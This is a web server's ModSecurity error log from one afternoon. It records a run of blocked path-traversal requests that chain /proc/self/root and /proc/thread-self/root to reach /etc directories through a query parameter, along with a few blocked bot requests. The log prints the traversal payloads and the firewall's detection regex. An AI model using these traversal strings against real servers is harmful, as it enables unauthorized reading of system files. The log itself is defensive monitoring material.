[Wed Mar 18 14:25:26.665110 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:49232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgBgkwaGbbGflqUZA3DQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:25:26.666244 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:46526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgBew_le52K8_3pV0CnwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 14:25:59.654028 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:39068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgJ9a6ubjKNq_cu4bD4AAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:26:14.138945 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:52334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgNimAPhZkrhU8w4mSXQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:26:22.772160 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:44182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgPgkwaGbbGflqUZA3RQAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:27:06.999135 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:38938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgakzinOy1jxa1j4c_nQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:27:21.573583 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:36436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgeeoXxyEfFpUF8f-WtQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:27:26.506978 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:41152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgfgbLMZ6AikZjR9Xk9AAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:27:32.412212 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:56132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrghNa6ubjKNq_cu4bECwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:27:36.625432 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:47332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgiCmAPhZkrhU8w4mSjwAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:28:05.770936 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:42926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgpeoXxyEfFpUF8f-W_wAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:28:20.490167 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:53682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgtNa6ubjKNq_cu4bEKgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:28:24.563745 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:56142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgtwbLMZ6AikZjR9XlPQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:28:41.306579 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:49588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrgyeoXxyEfFpUF8f-XKQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:29:09.432576 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:41910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrg5ew_le52K8_3pV0DTQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:29:11.853000 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:36782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrg58df6f5d65gmYZT63QAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:29:22.263819 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.244.43:41424] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrg8kzinOy1jxa1j4dACgAAAQ4"]
[Wed Mar 18 14:29:29.970408 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.228.61:44850] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrg98df6f5d65gmYZT68gAAAsg"]
[Wed Mar 18 14:29:56.740267 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:54370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhFOoXxyEfFpUF8f-XyAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:30:05.359899 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:36788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhHeyqAr6etmhZHNruKAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:30:34.067201 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:49002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhOuw_le52K8_3pV0DmgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:30:48.125363 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:46050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhR8df6f5d65gmYZT7VAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:31:09.872298 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:45130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhXda6ubjKNq_cu4bFAAAAA0Y"], referer: 